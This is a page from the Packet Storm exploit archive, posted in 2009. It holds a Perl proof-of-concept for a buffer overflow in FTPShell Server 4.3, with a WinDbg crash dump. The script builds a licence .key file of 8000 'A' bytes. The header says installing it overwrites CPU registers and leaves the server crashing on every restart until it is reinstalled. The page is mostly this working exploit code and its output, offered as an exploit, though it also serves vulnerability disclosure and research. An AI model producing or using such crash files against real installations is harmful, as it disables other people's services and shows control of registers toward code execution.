exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FTPShell Server 4.3 Buffer Overflow

FTPShell Server 4.3 Buffer Overflow
Posted Jan 23, 2009
Authored by LiquidWorm | Site zeroscience.mk

FTPShell Server version 4.3 suffers from a buffer overflow vulnerability that can be exploited remotely or locally. The failed bounds checking revolves around the .key file and this file exploits this vulnerability.

tags | exploit, overflow
SHA-256 | c7b701da9e34422a1e03600c1c8de1adc503ede07079b1ec39b9493e5b78a3b5

FTPShell Server 4.3 Buffer Overflow

Change Mirror Download
#!/usr/bin/perl
#
# Title: FTPShell Server 4.3 (licence key) Remote Buffer Overflow PoC
#
# Summary: FTPShell server is a windows FTP service that enables remote file downloads and uploads.
# It supports regular and secure FTP based on both SSL/TLS and SSH2. It is also extremely easy to
# configure and use.
#
# Product web page: http://www.ftpshell.com/index.htm
#
# Desc: FTPShell Server 4.3 suffers from buffer overflow vulnerability that can be exploited remotely or localy.
# It fails to perform adequate boundry condition of the input .key file, allowing us to overwrite the EAX and EDX
# registers. When trying to install licence with less than 8000 bytes we get a message: "It appears that your key
# file is corrupt or invalid.", but when installing a licence with 8000 bytes we get a message: "Your licence key
# has been succesfully loaded. Please restart the program."
#
# Note: When you restart the program, it will always crash untill you repair it or reinstall it.
#
#
# ---------------------------------WinDbg-------------------------------------
#
# (1178.1d4): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00b159c0 ecx=00b159c0 edx=41414141 esi=00b1c630 edi=00000005
# eip=004039a0 esp=0012f3bc ebp=00000000 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
#
# ftpshelldscp+0x39a0:
# 004039a0 ff5210 call dword ptr [edx+10h] ds:0023:41414151=????????
#
# ----------------------------------------------------------------------------
#
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail [w00t] com
#
# http://www.zeroscience.org
#
# 22.01.2009
#
####################################################################################


$file = "Yes_Man.key";

$payload = "\x41" x 8000;

print "\n\n[-] Buffering malicious playlist file. Please wait...\r\n";

sleep (1);

open (key, ">./$file") || die "\nCan't open $file: $!";

print key "$payload";

close (key);

print "\n\n[+] File $file successfully created!\n\n\a";


Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close